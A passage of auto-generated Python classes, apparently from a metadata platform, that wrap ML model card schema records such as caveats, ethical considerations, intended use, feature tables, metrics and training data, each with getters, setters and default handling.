def construct_with_defaults(cls) -> "CaveatDetailsClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.needsFurtherTesting = self.RECORD_SCHEMA.field_map["needsFurtherTesting"].default
self.caveatDescription = self.RECORD_SCHEMA.field_map["caveatDescription"].default
self.groupsNotRepresented = self.RECORD_SCHEMA.field_map["groupsNotRepresented"].default
@property
def needsFurtherTesting(self) -> Union[None, bool]:
"""Getter: Did the results suggest any further testing?"""
return self._inner_dict.get('needsFurtherTesting') # type: ignore
@needsFurtherTesting.setter
def needsFurtherTesting(self, value: Union[None, bool]) -> None:
"""Setter: Did the results suggest any further testing?"""
self._inner_dict['needsFurtherTesting'] = value
@property
def caveatDescription(self) -> Union[None, str]:
"""Getter: Caveat Description
For ex: Given gender classes are binary (male/not male), which we include as male/female. Further work needed to evaluate across a spectrum of genders."""
return self._inner_dict.get('caveatDescription') # type: ignore
@caveatDescription.setter
def caveatDescription(self, value: Union[None, str]) -> None:
"""Setter: Caveat Description
For ex: Given gender classes are binary (male/not male), which we include as male/female. Further work needed to evaluate across a spectrum of genders."""
self._inner_dict['caveatDescription'] = value
@property
def groupsNotRepresented(self) -> Union[None, List[str]]:
"""Getter: Relevant groups that were not represented in the evaluation dataset?"""
return self._inner_dict.get('groupsNotRepresented') # type: ignore
@groupsNotRepresented.setter
def groupsNotRepresented(self, value: Union[None, List[str]]) -> None:
"""Setter: Relevant groups that were not represented in the evaluation dataset?"""
self._inner_dict['groupsNotRepresented'] = value
class CaveatsAndRecommendationsClass(DictWrapper):
"""This section should list additional concerns that were not covered in the previous sections. For example, did the results suggest any further testing? Were there any relevant groups that were not represented in the evaluation dataset? Are there additional recommendations for model use?"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.ml.metadata.CaveatsAndRecommendations")
def __init__(self,
caveats: Union[None, "CaveatDetailsClass"]=None,
recommendations: Union[None, str]=None,
idealDatasetCharacteristics: Union[None, List[str]]=None,
):
super().__init__()
self.caveats = caveats
self.recommendations = recommendations
self.idealDatasetCharacteristics = idealDatasetCharacteristics
@classmethod
def construct_with_defaults(cls) -> "CaveatsAndRecommendationsClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.caveats = self.RECORD_SCHEMA.field_map["caveats"].default
self.recommendations = self.RECORD_SCHEMA.field_map["recommendations"].default
self.idealDatasetCharacteristics = self.RECORD_SCHEMA.field_map["idealDatasetCharacteristics"].default
@property
def caveats(self) -> Union[None, "CaveatDetailsClass"]:
"""Getter: This section should list additional concerns that were not covered in the previous sections. For example, did the results suggest any further testing? Were there any relevant groups that were not represented in the evaluation dataset?"""
return self._inner_dict.get('caveats') # type: ignore
@caveats.setter
def caveats(self, value: Union[None, "CaveatDetailsClass"]) -> None:
"""Setter: This section should list additional concerns that were not covered in the previous sections. For example, did the results suggest any further testing? Were there any relevant groups that were not represented in the evaluation dataset?"""
self._inner_dict['caveats'] = value
@property
def recommendations(self) -> Union[None, str]:
"""Getter: Recommendations on where this MLModel should be used."""
return self._inner_dict.get('recommendations') # type: ignore
@recommendations.setter
def recommendations(self, value: Union[None, str]) -> None:
"""Setter: Recommendations on where this MLModel should be used."""
self._inner_dict['recommendations'] = value
@property
def idealDatasetCharacteristics(self) -> Union[None, List[str]]:
"""Getter: Ideal characteristics of an evaluation dataset for this MLModel"""
return self._inner_dict.get('idealDatasetCharacteristics') # type: ignore
@idealDatasetCharacteristics.setter
def idealDatasetCharacteristics(self, value: Union[None, List[str]]) -> None:
"""Setter: Ideal characteristics of an evaluation dataset for this MLModel"""
self._inner_dict['idealDatasetCharacteristics'] = value
class EthicalConsiderationsClass(DictWrapper):
"""This section is intended to demonstrate the ethical considerations that went into MLModel development, surfacing ethical challenges and solutions to stakeholders."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.ml.metadata.EthicalConsiderations")
def __init__(self,
data: Union[None, List[str]]=None,
humanLife: Union[None, List[str]]=None,
mitigations: Union[None, List[str]]=None,
risksAndHarms: Union[None, List[str]]=None,
useCases: Union[None, List[str]]=None,
):
super().__init__()
self.data = data
self.humanLife = humanLife
self.mitigations = mitigations
self.risksAndHarms = risksAndHarms
self.useCases = useCases
@classmethod
def construct_with_defaults(cls) -> "EthicalConsiderationsClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.data = self.RECORD_SCHEMA.field_map["data"].default
self.humanLife = self.RECORD_SCHEMA.field_map["humanLife"].default
self.mitigations = self.RECORD_SCHEMA.field_map["mitigations"].default
self.risksAndHarms = self.RECORD_SCHEMA.field_map["risksAndHarms"].default
self.useCases = self.RECORD_SCHEMA.field_map["useCases"].default
@property
def data(self) -> Union[None, List[str]]:
"""Getter: Does the MLModel use any sensitive data (e.g., protected classes)?"""
return self._inner_dict.get('data') # type: ignore
@data.setter
def data(self, value: Union[None, List[str]]) -> None:
"""Setter: Does the MLModel use any sensitive data (e.g., protected classes)?"""
self._inner_dict['data'] = value
@property
def humanLife(self) -> Union[None, List[str]]:
"""Getter: Is the MLModel intended to inform decisions about matters central to human life or flourishing – e.g., health or safety? Or could it be used in such a way?"""
return self._inner_dict.get('humanLife') # type: ignore
@humanLife.setter
def humanLife(self, value: Union[None, List[str]]) -> None:
"""Setter: Is the MLModel intended to inform decisions about matters central to human life or flourishing – e.g., health or safety? Or could it be used in such a way?"""
self._inner_dict['humanLife'] = value
@property
def mitigations(self) -> Union[None, List[str]]:
"""Getter: What risk mitigation strategies were used during MLModel development?"""
return self._inner_dict.get('mitigations') # type: ignore
@mitigations.setter
def mitigations(self, value: Union[None, List[str]]) -> None:
"""Setter: What risk mitigation strategies were used during MLModel development?"""
self._inner_dict['mitigations'] = value
@property
def risksAndHarms(self) -> Union[None, List[str]]:
"""Getter: What risks may be present in MLModel usage? Try to identify the potential recipients, likelihood, and magnitude of harms. If these cannot be determined, note that they were considered but remain unknown."""
return self._inner_dict.get('risksAndHarms') # type: ignore
@risksAndHarms.setter
def risksAndHarms(self, value: Union[None, List[str]]) -> None:
"""Setter: What risks may be present in MLModel usage? Try to identify the potential recipients, likelihood, and magnitude of harms. If these cannot be determined, note that they were considered but remain unknown."""
self._inner_dict['risksAndHarms'] = value
@property
def useCases(self) -> Union[None, List[str]]:
"""Getter: Are there any known MLModel use cases that are especially fraught? This may connect directly to the intended use section"""
return self._inner_dict.get('useCases') # type: ignore
@useCases.setter
def useCases(self, value: Union[None, List[str]]) -> None:
"""Setter: Are there any known MLModel use cases that are especially fraught? This may connect directly to the intended use section"""
self._inner_dict['useCases'] = value
class EvaluationDataClass(DictWrapper):
"""All referenced datasets would ideally point to any set of documents that provide visibility into the source and composition of the dataset."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.ml.metadata.EvaluationData")
def __init__(self,
evaluationData: List["BaseDataClass"],
):
super().__init__()
self.evaluationData = evaluationData
@classmethod
def construct_with_defaults(cls) -> "EvaluationDataClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.evaluationData = list()
@property
def evaluationData(self) -> List["BaseDataClass"]:
"""Getter: Details on the dataset(s) used for the quantitative analyses in the MLModel"""
return self._inner_dict.get('evaluationData') # type: ignore
@evaluationData.setter
def evaluationData(self, value: List["BaseDataClass"]) -> None:
"""Setter: Details on the dataset(s) used for the quantitative analyses in the MLModel"""
self._inner_dict['evaluationData'] = value
class IntendedUseClass(DictWrapper):
"""Intended Use for the ML Model"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.ml.metadata.IntendedUse")
def __init__(self,
primaryUses: Union[None, List[str]]=None,
primaryUsers: Union[None, List[Union[str, "IntendedUserTypeClass"]]]=None,
outOfScopeUses: Union[None, List[str]]=None,
):
super().__init__()
self.primaryUses = primaryUses
self.primaryUsers = primaryUsers
self.outOfScopeUses = outOfScopeUses
@classmethod
def construct_with_defaults(cls) -> "IntendedUseClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.primaryUses = self.RECORD_SCHEMA.field_map["primaryUses"].default
self.primaryUsers = self.RECORD_SCHEMA.field_map["primaryUsers"].default
self.outOfScopeUses = self.RECORD_SCHEMA.field_map["outOfScopeUses"].default
@property
def primaryUses(self) -> Union[None, List[str]]:
"""Getter: Primary Use cases for the MLModel."""
return self._inner_dict.get('primaryUses') # type: ignore
@primaryUses.setter
def primaryUses(self, value: Union[None, List[str]]) -> None:
"""Setter: Primary Use cases for the MLModel."""
self._inner_dict['primaryUses'] = value
@property
def primaryUsers(self) -> Union[None, List[Union[str, "IntendedUserTypeClass"]]]:
"""Getter: Primary Intended Users - For example, was the MLModel developed for entertainment purposes, for hobbyists, or enterprise solutions?"""
return self._inner_dict.get('primaryUsers') # type: ignore
@primaryUsers.setter
def primaryUsers(self, value: Union[None, List[Union[str, "IntendedUserTypeClass"]]]) -> None:
"""Setter: Primary Intended Users - For example, was the MLModel developed for entertainment purposes, for hobbyists, or enterprise solutions?"""
self._inner_dict['primaryUsers'] = value
@property
def outOfScopeUses(self) -> Union[None, List[str]]:
"""Getter: Highlight technology that the MLModel might easily be confused with, or related contexts that users could try to apply the MLModel to."""
return self._inner_dict.get('outOfScopeUses') # type: ignore
@outOfScopeUses.setter
def outOfScopeUses(self, value: Union[None, List[str]]) -> None:
"""Setter: Highlight technology that the MLModel might easily be confused with, or related contexts that users could try to apply the MLModel to."""
self._inner_dict['outOfScopeUses'] = value
class IntendedUserTypeClass(object):
# No docs available.
ENTERPRISE = "ENTERPRISE"
HOBBY = "HOBBY"
ENTERTAINMENT = "ENTERTAINMENT"
class MLFeaturePropertiesClass(DictWrapper):
"""Properties associated with a MLFeature"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.ml.metadata.MLFeatureProperties")
def __init__(self,
description: Union[None, str]=None,
dataType: Union[None, Union[str, "MLFeatureDataTypeClass"]]=None,
version: Union[None, "VersionTagClass"]=None,
sources: Union[None, List[str]]=None,
):
super().__init__()
self.description = description
self.dataType = dataType
self.version = version
self.sources = sources
@classmethod
def construct_with_defaults(cls) -> "MLFeaturePropertiesClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.description = self.RECORD_SCHEMA.field_map["description"].default
self.dataType = self.RECORD_SCHEMA.field_map["dataType"].default
self.version = self.RECORD_SCHEMA.field_map["version"].default
self.sources = self.RECORD_SCHEMA.field_map["sources"].default
@property
def description(self) -> Union[None, str]:
"""Getter: Documentation of the MLFeature"""
return self._inner_dict.get('description') # type: ignore
@description.setter
def description(self, value: Union[None, str]) -> None:
"""Setter: Documentation of the MLFeature"""
self._inner_dict['description'] = value
@property
def dataType(self) -> Union[None, Union[str, "MLFeatureDataTypeClass"]]:
"""Getter: Data Type of the MLFeature"""
return self._inner_dict.get('dataType') # type: ignore
@dataType.setter
def dataType(self, value: Union[None, Union[str, "MLFeatureDataTypeClass"]]) -> None:
"""Setter: Data Type of the MLFeature"""
self._inner_dict['dataType'] = value
@property
def version(self) -> Union[None, "VersionTagClass"]:
"""Getter: Version of the MLFeature"""
return self._inner_dict.get('version') # type: ignore
@version.setter
def version(self, value: Union[None, "VersionTagClass"]) -> None:
"""Setter: Version of the MLFeature"""
self._inner_dict['version'] = value
@property
def sources(self) -> Union[None, List[str]]:
"""Getter: Source of the MLFeature"""
return self._inner_dict.get('sources') # type: ignore
@sources.setter
def sources(self, value: Union[None, List[str]]) -> None:
"""Setter: Source of the MLFeature"""
self._inner_dict['sources'] = value
class MLFeatureTablePropertiesClass(DictWrapper):
"""Properties associated with a MLFeatureTable"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.ml.metadata.MLFeatureTableProperties")
def __init__(self,
customProperties: Optional[Dict[str, str]]=None,
description: Union[None, str]=None,
mlFeatures: Union[None, List[str]]=None,
mlPrimaryKeys: Union[None, List[str]]=None,
):
super().__init__()
if customProperties is None:
# default: {}
self.customProperties = dict()
else:
self.customProperties = customProperties
self.description = description
self.mlFeatures = mlFeatures
self.mlPrimaryKeys = mlPrimaryKeys
@classmethod
def construct_with_defaults(cls) -> "MLFeatureTablePropertiesClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.customProperties = dict()
self.description = self.RECORD_SCHEMA.field_map["description"].default
self.mlFeatures = self.RECORD_SCHEMA.field_map["mlFeatures"].default
self.mlPrimaryKeys = self.RECORD_SCHEMA.field_map["mlPrimaryKeys"].default
@property
def customProperties(self) -> Dict[str, str]:
"""Getter: Custom property bag."""
return self._inner_dict.get('customProperties') # type: ignore
@customProperties.setter
def customProperties(self, value: Dict[str, str]) -> None:
"""Setter: Custom property bag."""
self._inner_dict['customProperties'] = value
@property
def description(self) -> Union[None, str]:
"""Getter: Documentation of the MLFeatureTable"""
return self._inner_dict.get('description') # type: ignore
@description.setter
def description(self, value: Union[None, str]) -> None:
"""Setter: Documentation of the MLFeatureTable"""
self._inner_dict['description'] = value
@property
def mlFeatures(self) -> Union[None, List[str]]:
"""Getter: List of features contained in the feature table"""
return self._inner_dict.get('mlFeatures') # type: ignore
@mlFeatures.setter
def mlFeatures(self, value: Union[None, List[str]]) -> None:
"""Setter: List of features contained in the feature table"""
self._inner_dict['mlFeatures'] = value
@property
def mlPrimaryKeys(self) -> Union[None, List[str]]:
"""Getter: List of primary keys in the feature table (if multiple, assumed to act as a composite key)"""
return self._inner_dict.get('mlPrimaryKeys') # type: ignore
@mlPrimaryKeys.setter
def mlPrimaryKeys(self, value: Union[None, List[str]]) -> None:
"""Setter: List of primary keys in the feature table (if multiple, assumed to act as a composite key)"""
self._inner_dict['mlPrimaryKeys'] = value
class MLModelFactorPromptsClass(DictWrapper):
"""Prompts which affect the performance of the MLModel"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.ml.metadata.MLModelFactorPrompts")
def __init__(self,
relevantFactors: Union[None, List["MLModelFactorsClass"]]=None,
evaluationFactors: Union[None, List["MLModelFactorsClass"]]=None,
):
super().__init__()
self.relevantFactors = relevantFactors
self.evaluationFactors = evaluationFactors
@classmethod
def construct_with_defaults(cls) -> "MLModelFactorPromptsClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.relevantFactors = self.RECORD_SCHEMA.field_map["relevantFactors"].default
self.evaluationFactors = self.RECORD_SCHEMA.field_map["evaluationFactors"].default
@property
def relevantFactors(self) -> Union[None, List["MLModelFactorsClass"]]:
"""Getter: What are foreseeable salient factors for which MLModel performance may vary, and how were these determined?"""
return self._inner_dict.get('relevantFactors') # type: ignore
@relevantFactors.setter
def relevantFactors(self, value: Union[None, List["MLModelFactorsClass"]]) -> None:
"""Setter: What are foreseeable salient factors for which MLModel performance may vary, and how were these determined?"""
self._inner_dict['relevantFactors'] = value
@property
def evaluationFactors(self) -> Union[None, List["MLModelFactorsClass"]]:
"""Getter: Which factors are being reported, and why were these chosen?"""
return self._inner_dict.get('evaluationFactors') # type: ignore
@evaluationFactors.setter
def evaluationFactors(self, value: Union[None, List["MLModelFactorsClass"]]) -> None:
"""Setter: Which factors are being reported, and why were these chosen?"""
self._inner_dict['evaluationFactors'] = value
class MLModelFactorsClass(DictWrapper):
"""Factors affecting the performance of the MLModel."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.ml.metadata.MLModelFactors")
def __init__(self,
groups: Union[None, List[str]]=None,
instrumentation: Union[None, List[str]]=None,
environment: Union[None, List[str]]=None,
):
super().__init__()
self.groups = groups
self.instrumentation = instrumentation
self.environment = environment
@classmethod
def construct_with_defaults(cls) -> "MLModelFactorsClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.groups = self.RECORD_SCHEMA.field_map["groups"].default
self.instrumentation = self.RECORD_SCHEMA.field_map["instrumentation"].default
self.environment = self.RECORD_SCHEMA.field_map["environment"].default
@property
def groups(self) -> Union[None, List[str]]:
"""Getter: Groups refers to distinct categories with similar characteristics that are present in the evaluation data instances.
For human-centric machine learning MLModels, groups are people who share one or multiple characteristics."""
return self._inner_dict.get('groups') # type: ignore
@groups.setter
def groups(self, value: Union[None, List[str]]) -> None:
"""Setter: Groups refers to distinct categories with similar characteristics that are present in the evaluation data instances.
For human-centric machine learning MLModels, groups are people who share one or multiple characteristics."""
self._inner_dict['groups'] = value
@property
def instrumentation(self) -> Union[None, List[str]]:
"""Getter: The performance of a MLModel can vary depending on what instruments were used to capture the input to the MLModel.
For example, a face detection model may perform differently depending on the camera’s hardware and software,
including lens, image stabilization, high dynamic range techniques, and background blurring for portrait mode."""
return self._inner_dict.get('instrumentation') # type: ignore
@instrumentation.setter
def instrumentation(self, value: Union[None, List[str]]) -> None:
"""Setter: The performance of a MLModel can vary depending on what instruments were used to capture the input to the MLModel.
For example, a face detection model may perform differently depending on the camera’s hardware and software,
including lens, image stabilization, high dynamic range techniques, and background blurring for portrait mode."""
self._inner_dict['instrumentation'] = value
@property
def environment(self) -> Union[None, List[str]]:
"""Getter: A further factor affecting MLModel performance is the environment in which it is deployed."""
return self._inner_dict.get('environment') # type: ignore
@environment.setter
def environment(self, value: Union[None, List[str]]) -> None:
"""Setter: A further factor affecting MLModel performance is the environment in which it is deployed."""
self._inner_dict['environment'] = value
class MLModelPropertiesClass(DictWrapper):
"""Properties associated with a ML Model"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.ml.metadata.MLModelProperties")
def __init__(self,
customProperties: Optional[Dict[str, str]]=None,
description: Union[None, str]=None,
date: Union[None, int]=None,
version: Union[None, "VersionTagClass"]=None,
type: Union[None, str]=None,
        hyperParameters: Union[None, Dict[str, Union[str, int, float, bool]]]=None,
mlFeatures: Union[None, List[str]]=None,
tags: Optional[List[str]]=None,
trainingJobs: Union[None, List[str]]=None,
downstreamJobs: Union[None, List[str]]=None,
):
super().__init__()
if customProperties is None:
# default: {}
self.customProperties = dict()
else:
self.customProperties = customProperties
self.description = description
self.date = date
self.version = version
self.type = type
self.hyperParameters = hyperParameters
self.mlFeatures = mlFeatures
if tags is None:
# default: []
self.tags = list()
else:
self.tags = tags
self.trainingJobs = trainingJobs
self.downstreamJobs = downstreamJobs
@classmethod
def construct_with_defaults(cls) -> "MLModelPropertiesClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.customProperties = dict()
self.description = self.RECORD_SCHEMA.field_map["description"].default
self.date = self.RECORD_SCHEMA.field_map["date"].default
self.version = self.RECORD_SCHEMA.field_map["version"].default
self.type = self.RECORD_SCHEMA.field_map["type"].default
self.hyperParameters = self.RECORD_SCHEMA.field_map["hyperParameters"].default
self.mlFeatures = self.RECORD_SCHEMA.field_map["mlFeatures"].default
self.tags = list()
self.trainingJobs = self.RECORD_SCHEMA.field_map["trainingJobs"].default
self.downstreamJobs = self.RECORD_SCHEMA.field_map["downstreamJobs"].default
@property
def customProperties(self) -> Dict[str, str]:
"""Getter: Custom property bag."""
return self._inner_dict.get('customProperties') # type: ignore
@customProperties.setter
def customProperties(self, value: Dict[str, str]) -> None:
"""Setter: Custom property bag."""
self._inner_dict['customProperties'] = value
@property
def description(self) -> Union[None, str]:
"""Getter: Documentation of the MLModel"""
return self._inner_dict.get('description') # type: ignore
@description.setter
def description(self, value: Union[None, str]) -> None:
"""Setter: Documentation of the MLModel"""
self._inner_dict['description'] = value
@property
def date(self) -> Union[None, int]:
"""Getter: Date when the MLModel was developed"""
return self._inner_dict.get('date') # type: ignore
@date.setter
def date(self, value: Union[None, int]) -> None:
"""Setter: Date when the MLModel was developed"""
self._inner_dict['date'] = value
@property
def version(self) -> Union[None, "VersionTagClass"]:
"""Getter: Version of the MLModel"""
return self._inner_dict.get('version') # type: ignore
@version.setter
def version(self, value: Union[None, "VersionTagClass"]) -> None:
"""Setter: Version of the MLModel"""
self._inner_dict['version'] = value
@property
def type(self) -> Union[None, str]:
"""Getter: Type of Algorithm or MLModel such as whether it is a Naive Bayes classifier, Convolutional Neural Network, etc"""
return self._inner_dict.get('type') # type: ignore
@type.setter
def type(self, value: Union[None, str]) -> None:
"""Setter: Type of Algorithm or MLModel such as whether it is a Naive Bayes classifier, Convolutional Neural Network, etc"""
self._inner_dict['type'] = value
@property
    def hyperParameters(self) -> Union[None, Dict[str, Union[str, int, float, bool]]]:
"""Getter: Hyper Parameters of the MLModel"""
return self._inner_dict.get('hyperParameters') # type: ignore
@hyperParameters.setter
    def hyperParameters(self, value: Union[None, Dict[str, Union[str, int, float, bool]]]) -> None:
"""Setter: Hyper Parameters of the MLModel"""
self._inner_dict['hyperParameters'] = value
@property
def mlFeatures(self) -> Union[None, List[str]]:
"""Getter: List of features used for MLModel training"""
return self._inner_dict.get('mlFeatures') # type: ignore
@mlFeatures.setter
def mlFeatures(self, value: Union[None, List[str]]) -> None:
"""Setter: List of features used for MLModel training"""
self._inner_dict['mlFeatures'] = value
@property
def tags(self) -> List[str]:
"""Getter: Tags for the MLModel"""
return self._inner_dict.get('tags') # type: ignore
@tags.setter
def tags(self, value: List[str]) -> None:
"""Setter: Tags for the MLModel"""
self._inner_dict['tags'] = value
@property
def trainingJobs(self) -> Union[None, List[str]]:
"""Getter: List of jobs (if any) used to train the model"""
return self._inner_dict.get('trainingJobs') # type: ignore
@trainingJobs.setter
def trainingJobs(self, value: Union[None, List[str]]) -> None:
"""Setter: List of jobs (if any) used to train the model"""
self._inner_dict['trainingJobs'] = value
@property
def downstreamJobs(self) -> Union[None, List[str]]:
"""Getter: List of jobs (if any) that use the model"""
return self._inner_dict.get('downstreamJobs') # type: ignore
@downstreamJobs.setter
def downstreamJobs(self, value: Union[None, List[str]]) -> None:
"""Setter: List of jobs (if any) that use the model"""
self._inner_dict['downstreamJobs'] = value
class MLPrimaryKeyPropertiesClass(DictWrapper):
"""Properties associated with a MLPrimaryKey"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.ml.metadata.MLPrimaryKeyProperties")
def __init__(self,
sources: List[str],
description: Union[None, str]=None,
dataType: Union[None, Union[str, "MLFeatureDataTypeClass"]]=None,
version: Union[None, "VersionTagClass"]=None,
):
super().__init__()
self.description = description
self.dataType = dataType
self.version = version
self.sources = sources
@classmethod
def construct_with_defaults(cls) -> "MLPrimaryKeyPropertiesClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.description = self.RECORD_SCHEMA.field_map["description"].default
self.dataType = self.RECORD_SCHEMA.field_map["dataType"].default
self.version = self.RECORD_SCHEMA.field_map["version"].default
self.sources = list()
@property
def description(self) -> Union[None, str]:
"""Getter: Documentation of the MLPrimaryKey"""
return self._inner_dict.get('description') # type: ignore
@description.setter
def description(self, value: Union[None, str]) -> None:
"""Setter: Documentation of the MLPrimaryKey"""
self._inner_dict['description'] = value
@property
def dataType(self) -> Union[None, Union[str, "MLFeatureDataTypeClass"]]:
"""Getter: Data Type of the MLPrimaryKey"""
return self._inner_dict.get('dataType') # type: ignore
@dataType.setter
def dataType(self, value: Union[None, Union[str, "MLFeatureDataTypeClass"]]) -> None:
"""Setter: Data Type of the MLPrimaryKey"""
self._inner_dict['dataType'] = value
@property
def version(self) -> Union[None, "VersionTagClass"]:
"""Getter: Version of the MLPrimaryKey"""
return self._inner_dict.get('version') # type: ignore
@version.setter
def version(self, value: Union[None, "VersionTagClass"]) -> None:
"""Setter: Version of the MLPrimaryKey"""
self._inner_dict['version'] = value
@property
def sources(self) -> List[str]:
"""Getter: Source of the MLPrimaryKey"""
return self._inner_dict.get('sources') # type: ignore
@sources.setter
def sources(self, value: List[str]) -> None:
"""Setter: Source of the MLPrimaryKey"""
self._inner_dict['sources'] = value
class MetricsClass(DictWrapper):
"""Metrics to be featured for the MLModel."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.ml.metadata.Metrics")
def __init__(self,
performanceMeasures: Union[None, List[str]]=None,
decisionThreshold: Union[None, List[str]]=None,
):
super().__init__()
self.performanceMeasures = performanceMeasures
self.decisionThreshold = decisionThreshold
@classmethod
def construct_with_defaults(cls) -> "MetricsClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.performanceMeasures = self.RECORD_SCHEMA.field_map["performanceMeasures"].default
self.decisionThreshold = self.RECORD_SCHEMA.field_map["decisionThreshold"].default
@property
def performanceMeasures(self) -> Union[None, List[str]]:
"""Getter: Measures of MLModel performance"""
return self._inner_dict.get('performanceMeasures') # type: ignore
@performanceMeasures.setter
def performanceMeasures(self, value: Union[None, List[str]]) -> None:
"""Setter: Measures of MLModel performance"""
self._inner_dict['performanceMeasures'] = value
@property
def decisionThreshold(self) -> Union[None, List[str]]:
"""Getter: Decision Thresholds used (if any)?"""
return self._inner_dict.get('decisionThreshold') # type: ignore
@decisionThreshold.setter
def decisionThreshold(self, value: Union[None, List[str]]) -> None:
"""Setter: Decision Thresholds used (if any)?"""
self._inner_dict['decisionThreshold'] = value
class QuantitativeAnalysesClass(DictWrapper):
"""Quantitative analyses should be disaggregated, that is, broken down by the chosen factors. Quantitative analyses should provide the results of evaluating the MLModel according to the chosen metrics, providing confidence interval values when possible."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.ml.metadata.QuantitativeAnalyses")
def __init__(self,
unitaryResults: Union[None, str]=None,
intersectionalResults: Union[None, str]=None,
):
super().__init__()
self.unitaryResults = unitaryResults
self.intersectionalResults = intersectionalResults
@classmethod
def construct_with_defaults(cls) -> "QuantitativeAnalysesClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.unitaryResults = self.RECORD_SCHEMA.field_map["unitaryResults"].default
self.intersectionalResults = self.RECORD_SCHEMA.field_map["intersectionalResults"].default
@property
def unitaryResults(self) -> Union[None, str]:
"""Getter: Link to a dashboard with results showing how the MLModel performed with respect to each factor"""
return self._inner_dict.get('unitaryResults') # type: ignore
@unitaryResults.setter
def unitaryResults(self, value: Union[None, str]) -> None:
"""Setter: Link to a dashboard with results showing how the MLModel performed with respect to each factor"""
self._inner_dict['unitaryResults'] = value
@property
def intersectionalResults(self) -> Union[None, str]:
"""Getter: Link to a dashboard with results showing how the MLModel performed with respect to the intersection of evaluated factors?"""
return self._inner_dict.get('intersectionalResults') # type: ignore
@intersectionalResults.setter
def intersectionalResults(self, value: Union[None, str]) -> None:
"""Setter: Link to a dashboard with results showing how the MLModel performed with respect to the intersection of evaluated factors?"""
self._inner_dict['intersectionalResults'] = value
class SourceCodeClass(DictWrapper):
"""Source Code"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.ml.metadata.SourceCode")
def __init__(self,
sourceCode: List["SourceCodeUrlClass"],
):
super().__init__()
self.sourceCode = sourceCode
@classmethod
def construct_with_defaults(cls) -> "SourceCodeClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.sourceCode = list()
@property
def sourceCode(self) -> List["SourceCodeUrlClass"]:
"""Getter: Source Code along with types"""
return self._inner_dict.get('sourceCode') # type: ignore
@sourceCode.setter
def sourceCode(self, value: List["SourceCodeUrlClass"]) -> None:
"""Setter: Source Code along with types"""
self._inner_dict['sourceCode'] = value
class SourceCodeUrlClass(DictWrapper):
"""Source Code Url Entity"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.ml.metadata.SourceCodeUrl")
def __init__(self,
type: Union[str, "SourceCodeUrlTypeClass"],
sourceCodeUrl: str,
):
super().__init__()
self.type = type
self.sourceCodeUrl = sourceCodeUrl
@classmethod
def construct_with_defaults(cls) -> "SourceCodeUrlClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.type = SourceCodeUrlTypeClass.ML_MODEL_SOURCE_CODE
self.sourceCodeUrl = str()
@property
def type(self) -> Union[str, "SourceCodeUrlTypeClass"]:
"""Getter: Source Code Url Types"""
return self._inner_dict.get('type') # type: ignore
@type.setter
def type(self, value: Union[str, "SourceCodeUrlTypeClass"]) -> None:
"""Setter: Source Code Url Types"""
self._inner_dict['type'] = value
@property
def sourceCodeUrl(self) -> str:
"""Getter: Source Code Url"""
return self._inner_dict.get('sourceCodeUrl') # type: ignore
@sourceCodeUrl.setter
def sourceCodeUrl(self, value: str) -> None:
"""Setter: Source Code Url"""
self._inner_dict['sourceCodeUrl'] = value
class SourceCodeUrlTypeClass(object):
# No docs available.
ML_MODEL_SOURCE_CODE = "ML_MODEL_SOURCE_CODE"
TRAINING_PIPELINE_SOURCE_CODE = "TRAINING_PIPELINE_SOURCE_CODE"
EVALUATION_PIPELINE_SOURCE_CODE = "EVALUATION_PIPELINE_SOURCE_CODE"
class TrainingDataClass(DictWrapper):
"""Ideally, the MLModel card would contain as much information about the training data as the evaluation data. However, there might be cases where it is not feasible to provide this level of detailed information about the training data. For example, the data may be proprietary, or require a non-disclosure agreement. In these cases, we advocate for basic details about the distributions over groups in the data, as well as any other details that could inform stakeholders on the kinds of biases the model may have encoded."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.ml.metadata.TrainingData")
def __init__(self,
trainingData: List["BaseDataClass"],
):
super().__init__()
self.trainingData = trainingData
@classmethod
def construct_with_defaults(cls) -> "TrainingDataClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.trainingData = list()
@property
def trainingData(self) -> List["BaseDataClass"]:
"""Getter: Details on the dataset(s) used for training the MLModel"""
return self._inner_dict.get('trainingData') # type: ignore
@trainingData.setter
def trainingData(self, value: List["BaseDataClass"]) -> None:
"""Setter: Details on the dataset(s) used for training the MLModel"""
self._inner_dict['trainingData'] = value
class MetadataAuditEventClass(DictWrapper):
"""Kafka event for capturing update made to an entity's metadata."""
